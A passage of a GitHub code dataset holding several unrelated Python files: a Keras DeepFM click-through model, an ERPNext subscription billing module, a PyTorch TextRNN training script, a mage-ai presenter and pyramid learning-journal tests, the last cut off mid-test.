decay=0.1)\n\n self.model.compile(optimizer=solver, loss='binary_crossentropy', metrics=[auc, log_loss])\n plot_model(self.model, to_file='DeepFM.png', rankdir='LR')\n return self.model\n\n def fit(self, X, y, val_X, val_y, batch_size=None, epochs=None):\n if not batch_size:\n batch_size = self.batch_size\n if not epochs:\n epochs = self.epochs\n his = self.model.fit(X, y, batch_size=batch_size, validation_data=(val_X, val_y), epochs=epochs)\n self.model.save(self.model_name)\n return his\n\n def predict(self, test_X):\n model = keras.models.load_model(self.model_name, custom_objects={\"auc\": auc, \"log_loss\": log_loss})\n y_pred = model.predict(test_X)\n return y_pred\n\n# PFA, prob false alert for binary classifier\ndef binary_PFA(y_true, y_pred, threshold=K.variable(value=0.5)):\n y_pred = K.cast(y_pred >= threshold, 'float32')\n # N = total number of negative labels\n N = K.sum(1 - y_true)\n # FP = total number of false alerts, alerts from the negative class labels\n FP = K.sum(y_pred - y_pred * y_true)\n return FP/N\n\n# P_TA prob true alerts for binary classifier\ndef binary_PTA(y_true, y_pred, threshold=K.variable(value=0.5)):\n y_pred = K.cast(y_pred >= threshold, 'float32')\n # P = total number of positive labels\n P = K.sum(y_true)\n # TP = total number of correct alerts, alerts from the positive class labels\n TP = K.sum(y_pred * y_true)\n return TP/P\n\ndef auc(y_true, y_pred):\n ptas = tf.stack([binary_PTA(y_true,y_pred,k) for k in np.linspace(0, 1, 1000)],axis=0)\n pfas = tf.stack([binary_PFA(y_true,y_pred,k) for k in np.linspace(0, 1, 1000)],axis=0)\n pfas = tf.concat([tf.ones((1,)) ,pfas],axis=0)\n binSizes = -(pfas[1:]-pfas[:-1])\n s = ptas*binSizes\n return K.sum(s, axis=0)\n\n\nif __name__ == '__main__':\n df_all = pd.read_csv(\"../ctr_data.csv\")\n df_train = df_all[:int(len(df_all)*0.8)]\n df_test = df_all[int(len(df_all)*0.8):]\n print(df_train.head())\n print(df_test.head())\n\n all_columns = df_train.columns.tolist()\n\n params = {\"label_col\": \"click\",\n \"continue_col\": [\"C14\", \"C15\", \"C16\", \"C17\", \"C18\", \"C19\", \"C20\", \"C21\"],\n \"dnn_layers\": 2,\n \"emb_dims\": 8,\n \"dnn_dims\": 32,\n \"learning_rate\": 0.01,\n \"batch_size\": 64,\n \"epochs\": 25,\n \"random_seed\": 2021,\n \"regularize\": keras.regularizers.l2,\n \"opt_reg_param\": 0.15,\n \"layer_reg_param\": 0.2,\n \"dropout\": 0.8,\n \"continue_use_emb\": True,\n \"model_name\": \"deepFM\"\n }\n\n all_features = all_columns.copy()\n all_features.remove(params.get(\"label_col\"))\n continue_columns = params.get(\"continue_col\", [])\n print(continue_columns, all_columns)\n\n col_index = []\n for col in all_features:\n col_index.append(all_columns.index(col))\n\n target_col = all_columns.index(params.get(\"label_col\"))\n\n category_columns = all_features.copy()\n [category_columns.remove(x) for x in continue_columns]\n max_features = {}\n for i in range(len(category_columns)):\n max_features[category_columns[i]] = (df_all[category_columns[i]].unique().shape[0])\n\n # del df_all\n # gc.collect()\n\n max_features_df = pd.DataFrame(data=np.array([list(max_features.keys()), list(max_features.values())]).T,\n columns=['ids', 'max_features'], index=range(len(max_features)))\n\n max_features = pd.merge(pd.DataFrame(category_columns, columns=['ids']), max_features_df, on=['ids'])\n\n max_features.max_features = max_features.max_features.astype(int)\n max_features = max_features.max_features.tolist()\n params[\"category_col\"] = max_features\n\n for i in category_columns:\n df_train[i], df_test[i] = category_encode(df_train[i].values.reshape(-1, 1),\n df_test[i].values.reshape(-1, 1), one_hot=False)\n\n train_x, train_y = df_train[all_features], df_train[params.get('label_col')]\n test_x, test_y = df_test[all_features], df_test[params.get('label_col')]\n del df_test\n del df_train\n gc.collect()\n\n X = train_x.T.values\n y = train_y.values\n X = [np.array(X[i, :]) for i in range(X.shape[0])]\n validation_data = (test_x.T.values, test_y.values)\n val_X, val_y = validation_data\n val_X = [np.array(val_X[i, :]) for i in range(val_X.shape[0])]\n\n del train_x\n del validation_data\n gc.collect()\n\n deepFM = DeepFM(params)\n deepFM.build_model()\n his = deepFM.fit(X, y, val_X, val_y, epochs=15)\n\n pd.DataFrame(his.history).to_csv(\"%s_his.csv\" % (time.strftime('%Y-%m-%d', time.localtime(time.time()))))\n\n y_pred = deepFM.predict(val_X)\n\n from sklearn.metrics import roc_auc_score, log_loss\n\n print(roc_auc_score(val_y, y_pred))\n print(log_loss(val_y, y_pred))","repo_name":"xnfan/MachineLearning","sub_path":"推荐专题/deepFM/deepFM.py","file_name":"deepFM.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71860155771","text":"from __future__ import unicode_literals\nimport frappe\nimport datetime\nfrom frappe.model.document import Document\nfrom erpnext.accounts.party import get_party_account, get_due_date\nimport math\nfrom frappe.utils import flt\nfrom collections import Counter\nfrom functools import reduce\nfrom operator import add\n\n\nclass MonthlyPSOFBilling(Document):\n \"\"\"Monthly Billing Generation\"\"\"\n\n def on_trash(self):\n self.status = 'Bills Deleted'\n linked_docs = self.count_linked_doc()\n frappe.get_doc(\"Monthly PSOF\", self.monthly_psof).db_set(\"billing_generated\", 0)\n\n frappe.db.delete(\"Subscription Bill\", {'subscription_period': self.name})\n frappe.db.delete(\"Subscription Bill Item\", {'subscription_period': self.name})\n frappe.db.delete(\"Monthly PSOF Bill\", {'subscription_period': self.name})\n\n frappe.db.delete(\"Sales Invoice\", {'subs_period': self.name})\n\n frappe.msgprint(msg=f\"\"\"Deleting the following documents:<br>\n <b>{linked_docs['s']}</b> Subscription Bill/s<br>\n <b>{linked_docs['sb']}</b> Subscription Bill Item/s<br>\n <b>{linked_docs['mb']}</b> Monthly Billing Items/s<br>\"\"\")\n frappe.db.commit()\n\n def count_linked_doc(self):\n subs_bill = frappe.db.count(\"Subscription Bill\", {'subscription_period': self.name})\n subs_bill_items = frappe.db.count(\"Subscription Bill Item\", {'subscription_period': self.name})\n monthly_bill = frappe.db.count(\"Monthly PSOF Bill\", {'subscription_period': self.name})\n return {\"s\": subs_bill, \"mb\": monthly_bill, \"sb\": subs_bill_items}\n\n def truncate(self, number, digits) -> float:\n stepper = 10.0 ** digits\n return math.trunc(stepper * number) / stepper\n\n def truncate_first(self, number, digits) -> float:\n stepper = 100.0 ** digits\n x = math.trunc(stepper * number) / stepper\n return self.truncate(x, 2)\n\n def autoname(self):\n self.name = self.subscription_period\n\n def on_cancel(self):\n frappe.db.set(self, 'status', 'Cancelled')\n # sb = frappe.get_doc(\"Subscription Bill\", {'subscription_period': self.name})\n #sb.cancel()\n\n frappe.db.sql(\"\"\"update `tabSubscription Bill` set docstatus=2\n WHERE subscription_period = %s \"\"\", (self.name))\n\n frappe.db.sql(\"\"\"update `tabSubscription Bill Item` set docstatus=2\n WHERE parent in ( select name from `tabSubscription Bill` where subscription_period= %s )\"\"\", (self.name))\n\n linked_docs = frappe.get_all(\"Sales Invoice\", filters={\"subs_period\": self.name})\n for linked_doc in linked_docs:\n linked_doc_obj = frappe.get_doc(\"Sales Invoice\", linked_doc.name)\n linked_doc_obj.cancel()\n\n #si = frappe.get_doc(\"Sales Invoice\", {'subs_period': self.name})\n #si.cancel()\n\n\n def check_accounts(self, items):\n for p in items:\n if None in [\n p.msf_ar_account,\n p.decoder_ar_account,\n p.card_ar_account,\n p.promo_ar_account,\n p.freight_ar_account,\n p.msf_sales_account,\n p.decoder_sales_account,\n p.card_sales_account,\n p.promo_sales_account,\n p.freight_sales_account,\n p.vat_account\n ]:\n frappe.msgprint(msg=f\"{p.subscription_program} has incomplete accounting details\",\n title=\"Incomplete Account Details\",\n indicator=\"red\",\n raise_exception=True)\n return True\n\n def on_submit(self):\n if self.billings:\n self.submit_billings()\n\n frappe.msgprint(\n msg='Bills successfully posted',\n title='Success',\n indicator='yellow',\n raise_exception=False\n )\n else:\n frappe.msgprint(\n msg='Billing should create first Before Submission',\n title='Billing Not Created',\n indicator='red',\n raise_exception=True\n )\n\n def submit_billings(self):\n bills = self.get_billings()\n for bill in bills:\n bill.submit()\n\n def get_billings(self):\n subscription_bill = frappe.db.get_list(\"Monthly PSOF Bill\", {\"parent\": self.name}, \"bill_no\", pluck=\"bill_no\")\n return [frappe.get_doc(\"Subscription Bill\", bill_no) for bill_no in subscription_bill]\n\n @frappe.whitelist()\n def create_sales_invoice(self):\n bills = self.get_billings()\n \n for bill in bills:\n bill.create_invoices()\n\n def create_journal_entries(self):\n mpsof = frappe.db.get_list(\"Monthly PSOF Bill\", {\"parent\": self.name}, as_dict=1)\n\n for b in mpsof:\n bill = frappe.db.get_list(\"Subscription Bill\", b.get(\"bill_no\"), as_dict=1)\n\n for i in bill:\n doc = frappe.new_doc(\"Journal Entry\")\n doc.entry_type = \"Journal Entry\"\n doc.posting_date = i.bill_date\n doc.bill_no = i.name\n doc.bill_date = i.bill_date\n doc.due_date = i.due_date\n doc.reference_no = i.name\n doc.reference_date = i.bill_date\n doc.subscription_period = i.subscription_period\n doc.user_remark = \"Billing Entry For \" + i.name\n\n item = frappe.db.sql(\"\"\"SELECT \n i.*,\n p.msf_ar_account,\n p.decoder_ar_account,\n p.card_ar_account,\n p.promo_ar_account,\n p.freight_ar_account,\n p.msf_sales_account,\n p.decoder_sales_account,\n p.card_sales_account,\n p.promo_sales_account,\n p.freight_sales_account,\n p.vat_account \n FROM \n `tabSubscription Bill Item` i, `tabSubscription Program` p\n WHERE i.parent = %s\n AND i.subscription_program = p.name\"\"\", (i.name), as_dict=1)\n\n if self.check_accounts(item):\n for d in item:\n if d.subscription_rate >= 0:\n doc.append('accounts', {\n \"account\": d.msf_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.subscription_fee,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.subscription_rate + d.vat\n })\n doc.append('accounts', {\n \"account\": d.msf_sales_account,\n \"credit\": d.subscription_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.subscription_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.subscription_fee - d.subscription_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.vat\n })\n if d.decoder_rate >= 0:\n doc.append('accounts', {\n \"account\": d.decoder_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": round(d.decoder_rate_vat, 2),\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.decoder_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.decoder_sales_account,\n \"credit\": round(d.decoder_rate, 2),\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.decoder_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": round(d.decoder_rate_vat, 2) - round(d.decoder_rate, 2),\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": round(d.decoder_rate_vat, 2) - round(d.decoder_rate, 2)\n })\n if d.card_rate >= 0:\n doc.append('accounts', {\n \"account\": d.card_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.card_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.card_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.card_sales_account,\n \"credit\": d.card_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.card_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.card_rate_vat - d.card_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.card_rate_vat - d.card_rate\n })\n if d.promo_rate >= 0:\n doc.append('accounts', {\n \"account\": d.promo_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.promo_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.promo_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.promo_sales_account,\n \"credit\": d.promo_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.promo_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.promo_rate_vat - d.promo_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.promo_rate_vat - d.promo_rate\n })\n if d.freight_rate >= 0:\n doc.append('accounts', {\n \"account\": d.freight_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.freight_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.freight_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.freight_sales_account,\n \"credit\": d.freight_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.freight_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.freight_rate_vat - d.freight_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.freight_rate_vat - d.freight_rate\n })\n\n doc.insert()\n doc.submit()\n bills = frappe.get_doc(\"Subscription Bill\", i.name)\n bills.journal_reference = doc.name\n bills.save()\n bills.submit()\n\n @frappe.whitelist()\n def create_bills(self):\n sales_bills = frappe.db.sql(\"\"\"\n SELECT \n d.customer, \n h.date, \n h.subscription_period,\n h.currency, \n p.exchange_rate, \n p.end_date,\n d.psof, \n d.parent,\n d.account_manager, \n d.tax_category as tx\n FROM \n `tabMonthly PSOF` h, \n `tabMonthly PSOF Program Bill` d, \n `tabSubscription Period` p\n WHERE \n h.name = d.parent \n AND \n h.name = %s\n AND \n h.subscription_period = p.name\n GROUP BY \n d.customer, \n h.date, \n h.subscription_period, \n p.exchange_rate; \"\"\", self.monthly_psof, as_dict=1)\n\n period = frappe.get_doc(\"Subscription Period\", self.subscription_period)\n\n def vat_(rate):\n if not rate:\n return 0\n return flt(rate / 1.12)\n\n def sum_(lists):\n return flt(sum([flt(i) for i in lists]), 2)\n\n def round2(rate):\n return frappe.db.sql(f\"SELECT ROUND({rate}, 2)\")[0][0]\n\n def round_convert(rate, exchange_rate=self.exchange_rate):\n return frappe.db.sql(f\"SELECT ROUND({rate} * {exchange_rate}, 2)\")[0][0]\n\n def get_difference(rate):\n if not rate:\n return 0\n return rate - vat_(rate)\n\n for bill in sales_bills:\n customer_ = frappe.get_doc(\"Customer\", bill.customer)\n doc = frappe.new_doc(\"Subscription Bill\")\n doc.customer = bill.customer\n doc.customer_name = bill.customer_name\n doc.bill_date = bill.date\n doc.subscription_period = bill.subscription_period\n doc.due_date = get_due_date(doc.bill_date, \"Customer\", doc.customer)\n doc.exchange_rate = self.exchange_rate\n doc.account_manager = bill.account_manager\n doc.assistant = customer_.billing_assistant\n doc.monthly_psof = bill.parent\n doc.psof = bill.psof\n\n sbill_items = frappe.db.get_all('Monthly PSOF Program Bill',\n {'parent': self.monthly_psof,\n 'customer': bill.customer},\n ['subscription_fee as sfee', 'subscription_rate as srate', 'vat',\n 'decoder_rate as drate', 'promo_rate as prate', 'freight_rate as frate',\n 'card_rate as crate', 'subscription_program as program', 'psof'])\n\n totals = {\n 't_msf': 0,\n 't_diff': 0,\n 't_vat_ex': 0,\n 't_vat': 0,\n 'msf': sum([i['sfee'] for i in sbill_items]),\n 'decoder': sum([i['drate'] for i in sbill_items]),\n 'promo': sum([i['prate'] for i in sbill_items]),\n 'freight': sum([i['frate'] for i in sbill_items]),\n 'card': sum([i['crate'] for i in sbill_items]),\n 'php_msf': sum([round_convert(i['sfee']) for i in sbill_items]),\n 'php_drate': sum([round_convert(i['drate']) for i in sbill_items]),\n 'php_prate': sum([round_convert(i['prate']) for i in sbill_items]),\n 'php_frate': sum([round_convert(i['frate']) for i in sbill_items]),\n 'php_crate': sum([round_convert(i['crate']) for i in sbill_items]),\n }\n\n for p in sbill_items:\n allocations = {\n \"msf\": round_convert(p.sfee),\n \"decoder_rate\": round_convert(p.drate),\n \"card_rate\": round_convert(p.crate),\n \"promo_rate\": round_convert(p.prate),\n \"freight_rate\": round_convert(p.frate),\n \"decoder_diff\": get_difference(round_convert(p.drate)),\n \"card_diff\": get_difference(round_convert(p.crate)),\n \"promo_diff\": get_difference(round_convert(p.prate)),\n \"freight_diff\": get_difference(round_convert(p.frate)),\n }\n allocations[\"total\"] = round2(sum((flt(allocations[\"decoder_rate\"]), flt(allocations[\"promo_rate\"]),\n flt(allocations[\"card_rate\"]), flt(allocations[\"freight_rate\"]))))\n allocations[\"vat_inc\"] = round2(allocations[\"msf\"] - allocations[\"total\"])\n allocations[\"vat_ex\"] = round2(vat_(allocations[\"vat_inc\"]))\n allocations[\"vat\"] = round2(allocations[\"vat_ex\"] * 0.12)\n allocations[\"vat_ex\"] = round2(allocations[\"vat_inc\"] - allocations[\"vat\"])\n allocations[\"comp_total\"] = round2(sum([allocations[\"vat_ex\"], allocations[\"vat\"],\n allocations[\"total\"]]))\n allocations[\"comp_diff\"] = allocations[\"msf\"] - allocations[\"comp_total\"]\n allocations[\"comp_vat_ex\"] = allocations[\"vat_ex\"] + allocations[\"comp_diff\"]\n\n bill_totals = {'created_from': self.monthly_psof, 'customer': doc.customer,\n 'subscription_period': doc.subscription_period, 'bill_date': doc.bill_date,\n \"subscription_program\": p.program, \"subs_fee\": p.sfee,\n \"subscription_fee\": allocations['msf'], \"subscription_rate_inc\": allocations[\"vat_inc\"],\n \"subscription_rate_ex\": allocations[\"vat_ex\"], \"vat\": allocations[\"vat\"],\n \"decoder_rate\": vat_(allocations[\"decoder_rate\"]),\n \"card_rate\": vat_(allocations[\"card_rate\"]),\n \"promo_rate\": vat_(allocations[\"promo_rate\"]),\n \"freight_rate\": vat_(allocations[\"freight_rate\"]), \"monthly_psof_no\": doc.monthly_psof,\n \"psof_no\": p.psof, 'total_alloc': vat_(allocations[\"total\"]),\n 'total_alloc_vat': allocations[\"total\"], \"decoder_rate_vat\": allocations[\"decoder_rate\"],\n \"card_rate_vat\": allocations[\"card_rate\"], \"promo_rate_vat\": allocations[\"promo_rate\"],\n \"freight_rate_vat\": allocations[\"freight_rate\"], 'card_diff': allocations[\"card_diff\"],\n 'decoder_diff': allocations[\"decoder_diff\"], 'freight_diff': allocations[\"freight_diff\"],\n 'promo_diff': allocations[\"promo_diff\"],\n 'total_diff': get_difference(allocations[\"total\"]),\n 'computed_total': allocations[\"comp_total\"], 'computed_diff': allocations[\"comp_diff\"],\n 'computed_vat_ex': allocations[\"comp_vat_ex\"], \"billing_currency\": \"PHP\",\n \"rounding_diff\": [],\n 'tax_category': bill.get('tx')}\n\n for i in [\"decoder\", \"card\", \"promo\", \"freight\"]:\n bill_totals[\"rounding_diff\"].append(flt((bill_totals.get(f\"{i}_rate_vat\") - (bill_totals.get(f\"{i}_rate_vat\") / 1.12)), 2) - bill_totals.get(f\"{i}_diff\"))\n\n bill_totals[\"rounding_diff\"] = flt(sum(bill_totals[\"rounding_diff\"]), 2)\n doc.append('items', bill_totals)\n\n totals[\"t_msf\"] += allocations[\"comp_total\"]\n totals[\"t_diff\"] += allocations[\"comp_diff\"]\n totals[\"t_vat_ex\"] += allocations[\"comp_vat_ex\"]\n totals[\"t_vat\"] += allocations[\"vat\"]\n\n doc.flags.ignore_mandatory = True\n doc.insert()\n\n totals[\"usd_allocation\"] = sum([totals['decoder'], totals['promo'], totals['freight'], totals['card']])\n totals[\"allocation\"] = sum([totals['php_drate'], totals['php_prate'], totals['php_frate'], totals['php_crate']])\n totals[\"vat\"] = totals[\"t_vat\"]\n totals[\"vat_inc\"] = totals[\"php_msf\"] - totals[\"allocation\"]\n totals[\"vat_ex\"] = totals[\"vat_inc\"] - totals[\"vat\"]\n totals[\"comp_total\"] = round2(sum((totals[\"vat_ex\"], totals[\"vat\"], totals[\"allocation\"])))\n totals[\"comp_diff\"] = totals[\"php_msf\"] - totals[\"comp_total\"]\n totals[\"comp_vat_ex\"] = totals[\"vat_ex\"] + totals[\"comp_diff\"]\n\n\n _totals_usd = reduce(add, (map(Counter, [\n {\"drate\": i.get(\"drate\"), \"prate\": i.get(\"prate\"), \"frate\": i.get(\"frate\"),\n \"crate\": i.get(\"crate\")} for i in sbill_items])))\n\n self.append('billings', {\n 'tax_category': bill.get('tx'),\n \"billing_currency\": \"PHP\",\n 'customer_name': customer_.customer_name,\n 'subscription_period': period.name,\n 'billing_date': period.end_date,\n 'currency': 'USD',\n 'exchange_rate': self.exchange_rate,\n \"account_manager\": doc.account_manager or \"\",\n \"assistant\": doc.assistant,\n \"customer\": doc.customer,\n \"bill_no\": doc.name,\n \"date\": doc.bill_date,\n 'total_msf': totals['msf'],\n 'total_msf_vat_inc': totals['msf'] - totals[\"usd_allocation\"],\n 'total_msf_vat_ex': vat_(totals['msf'] - totals[\"usd_allocation\"]),\n 'total_vat': vat_(totals['msf'] - totals[\"usd_allocation\"]) * 0.12,\n 'total_decoder_rate': totals['decoder'],\n 'total_promo_rate': totals['promo'],\n 'total_freight_rate': totals['freight'],\n 'total_card_rate': totals['card'],\n 'usd_msf': totals[\"php_msf\"],\n 'usd_msf_lv_inc': totals[\"vat_inc\"],\n 'usd_msf_lv_ex': totals[\"vat_ex\"],\n 'usd_vat': totals[\"vat\"],\n 'usd_decoder': totals[\"php_drate\"],\n 'usd_promo': totals[\"php_prate\"],\n 'usd_freight': totals[\"php_frate\"],\n 'usd_card': totals[\"php_crate\"],\n 'usd_decoder_ex': vat_(totals[\"decoder\"]),\n 'usd_promo_ex': vat_(totals[\"promo\"]),\n 'usd_freight_ex': vat_(totals[\"freight\"]),\n 'usd_card_ex': vat_(totals[\"card\"]),\n 'decoder_vat': get_difference(totals[\"php_drate\"]),\n 'promo_vat': get_difference(totals[\"php_prate\"]),\n 'freight_vat': get_difference(totals[\"php_frate\"]),\n 'card_vat': get_difference(totals[\"php_crate\"]),\n 'total_vat_inc': totals[\"allocation\"],\n \"computed_tamount\": totals[\"t_msf\"],\n \"computed_tdiff\": totals[\"t_diff\"],\n \"computed_vat_ex\": totals[\"t_vat_ex\"] + totals[\"t_diff\"],\n \"total_vat_ex\": sum_(vat_(totals[i]) for i in [\"decoder\", \"promo\", \"freight\", \"card\"]),\n \"total_vat_diff\": totals[\"allocation\"] - round2(vat_(totals[\"allocation\"])),\n \"t_drate_\": _totals_usd.get(\"drate\"),\n \"t_prate_\": _totals_usd.get(\"prate\"),\n \"t_frate_\": _totals_usd.get(\"frate\"),\n \"t_crate_\": _totals_usd.get(\"crate\"),\n \"t_rate_\": sum(_totals_usd.values()),\n \"v_drate\": get_difference(_totals_usd.get(\"drate\")),\n \"v_prate\": get_difference(_totals_usd.get(\"prate\")),\n \"v_frate\": get_difference(_totals_usd.get(\"frate\")),\n \"v_crate\": get_difference(_totals_usd.get(\"crate\")),\n \"v_rate\": get_difference(sum(_totals_usd.values())),\n \"x_drate\": vat_(totals[\"php_drate\"]),\n \"x_prate\": vat_(totals[\"php_prate\"]),\n \"x_frate\": vat_(totals[\"php_frate\"]),\n \"x_crate\": vat_(totals[\"php_crate\"]),\n \"x_rate\": vat_(totals[\"allocation\"]),\n })\n \n self.create_sales_invoice()\n\n frappe.msgprint(\n msg='Bill successfully generated',\n title='Success',\n indicator='yellow',\n raise_exception=False\n )\n self.save()\n self.db_set(\"generated\", 1)\n frappe.db.set_value(\"Monthly PSOF\", self.get(\"monthly_psof\"), \"billing_generated\", 1)\n","repo_name":"jeowsome/subscription","sub_path":"subscription/subscription/doctype/monthly_psof_billing/monthly_psof_billing.py","file_name":"monthly_psof_billing.py","file_ext":"py","file_size_in_byte":25452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42189660702","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n===============================================================\nauthor:XieDake\nemail:DakeXqq@126.com\ndate:2018\nintroduction:\n Train and eval for TextRNN!\n===============================================================\n\"\"\"\nimport torch\nfrom data_helper import generate_one_sample\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport random\n\ndef train_one_epoch(epoch_num,model,optimizer,data_train,batch_size,w2id):\n '''\n 完成一个epoch数据训练!\n 每一个batch进行一次BP!每一个Batch,print训练信息!\n 注意:该函数执行之前data_filter需要乱序!\n '''\n #shuffle\n random.shuffle(data_train)\n data_size=len(data_train)\n criterion = torch.nn.NLLLoss()\n for batchIndex in range(int(data_size / batch_size)):\n optimizer.zero_grad()\n batch_loss= 0.0\n counts = 0\n for step in range(batchIndex * batch_size, min((batchIndex + 1) * batch_size, data_size)):\n input, real_out = generate_one_sample(sent_label=data_train[step],w2id=w2id)\n if torch.cuda.is_available():\n input=input.cuda()\n real_out=real_out.cuda()\n output, hidden = model(input)\n #\n print(output)\n print(real_out)\n batch_loss += criterion(output,real_out)\n #\n counts += 1\n #\n print(\"At epoch:{},batch:{}——>loss_avg:{}\".format({epoch_num}, {batchIndex},{batch_loss.data[0] / counts}))\n #\n batch_loss.backward()\n #\n optimizer.step()\n\ndef eval_after_one_epoch(model,data_val,w2id):\n '''\n 每一个epoch结束,进行一次eval!\n 分类效果评估!confusion matrix!\n '''\n result=[]#[[y_true,y_pred],[y_true,y_pred],...]\n loss=0.0\n data_size=len(data_val)\n criterion=torch.nn.NLLLoss()\n for step in range(len(data_val)):\n tmp=[]\n tmp.append(data_val[step][0])#y_true\n input, real_out = generate_one_sample(sent_label=data_val[step],w2id=w2id)\n if torch.cuda.is_available():\n input = input.cuda()\n real_out = real_out.cuda()\n output, hidden = model(input)\n #\n pred_y = torch.max(output,1)[1].data[0]\n #\n tmp.append(pred_y)\n result.append(tmp)\n #\n loss += criterion(output, real_out)\n #\n return loss / data_size,result\n\ndef confusion_matrix(result):\n '''\n 测试集分类效果展示:Confusion_Matrix!\n '''\n result=np.array(result)\n print(classification_report(y_true=result[:,0],y_pred=result[:,-1]))\n","repo_name":"CCL2019GIT/TextClassification","sub_path":"TextRNN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7252664376","text":"from typing import Dict\n\nfrom mage_ai.api.presenters.BasePresenter import BasePresenter\n\n\nclass ComputeConnectionPresenter(BasePresenter):\n default_attributes = [\n 'actions',\n 'attributes',\n 'connection',\n 'description',\n 'error',\n 'group',\n 'name',\n 'required',\n 'state',\n 'status',\n 'status_calculated',\n 'steps',\n 'tab',\n 'target',\n 'uuid',\n ]\n\n async def prepare_present(self, **kwargs) -> Dict:\n return self.resource.model.to_dict()\n","repo_name":"omkar-foss/mage-ai","sub_path":"mage_ai/api/presenters/ComputeConnectionPresenter.py","file_name":"ComputeConnectionPresenter.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"32780987579","text":"\"\"\"Unit tests for all view functions.\"\"\"\n\nfrom __future__ import unicode_literals\nfrom pyramid.testing import DummyRequest\nimport pytest\nfrom pyramid import testing\nimport transaction\nfrom learning_journal.models import (\n Entry,\n get_tm_session,\n)\nfrom learning_journal.models.meta import Base\nfrom datetime import datetime\nfrom pyramid.httpexceptions import HTTPNotFound, HTTPFound, HTTPBadRequest\nfrom faker import Faker\nimport random\n\nFAKE = Faker()\n\n\n@pytest.fixture(scope='session')\ndef configuration(request):\n \"\"\"Config stuff for testing.\"\"\"\n config = testing.setUp(settings={\n 'sqlalchemy.url': 'postgres://localhost:5432/test-learning-journal'\n })\n config.include('learning_journal.models')\n\n def teardown():\n testing.tearDown()\n request.addfinalizer(teardown)\n return config\n\n\n@pytest.fixture\ndef db_session(configuration, request):\n \"\"\"Set up the db session for testing purposes.\"\"\"\n SessionFactory = configuration.registry[\"dbsession_factory\"]\n session = SessionFactory()\n engine = session.bind\n Base.metadata.create_all(engine)\n\n def teardown():\n session.transaction.rollback()\n Base.metadata.drop_all(engine)\n request.addfinalizer(teardown)\n return session\n\n\n@pytest.fixture\ndef dummy_req(db_session):\n \"\"\"Make a dummy GET request.\"\"\"\n return testing.DummyRequest(dbsession=db_session)\n\n\ndef test_list_view_returns_list_of_entries_in_dict(dummy_req):\n \"\"\"Test list view returns a list of all the entries as dicts.\"\"\"\n from learning_journal.views.default import list_view\n response = list_view(dummy_req)\n assert 'entries' in response\n assert isinstance(response['entries'], list)\n\n\ndef test_entry_exisits_and_is_in_list(dummy_req):\n \"\"\"Test that a dummy request creates a new entry.\"\"\"\n from learning_journal.views.default import list_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n dummy_req.dbsession.commit()\n response = list_view(dummy_req)\n assert new_entry.to_dict() in response['entries']\n\n\ndef test_detail_view_returns_details_of_entry_in_dict(dummy_req):\n \"\"\"Test detail view returns the details of one entry as dict.\"\"\"\n from learning_journal.views.default import detail_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n dummy_req.dbsession.commit()\n dummy_req.matchdict['id'] = 1\n response = detail_view(dummy_req)\n assert 'entry' in response\n assert isinstance(response['entry'], Entry)\n\n\ndef test_detail_view_raises_httpnotfound_for_invalid_id(dummy_req):\n \"\"\"Test detail view raises HTTPNotFound for invalid id.\"\"\"\n from learning_journal.views.default import detail_view\n dummy_req.matchdict['id'] = -1\n with pytest.raises(HTTPNotFound):\n detail_view(dummy_req)\n\n\ndef test_create_view_returns_empty_dict(dummy_req):\n \"\"\"Test create view returns an empty dict.\"\"\"\n from learning_journal.views.default import create_view\n response = create_view(dummy_req)\n assert not response\n assert isinstance(response, dict)\n\n\ndef test_update_view_returns_current_details_of_entry_in_dict(dummy_req):\n \"\"\"Test update view returns the current details of one entry as dict.\"\"\"\n from learning_journal.views.default import update_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n 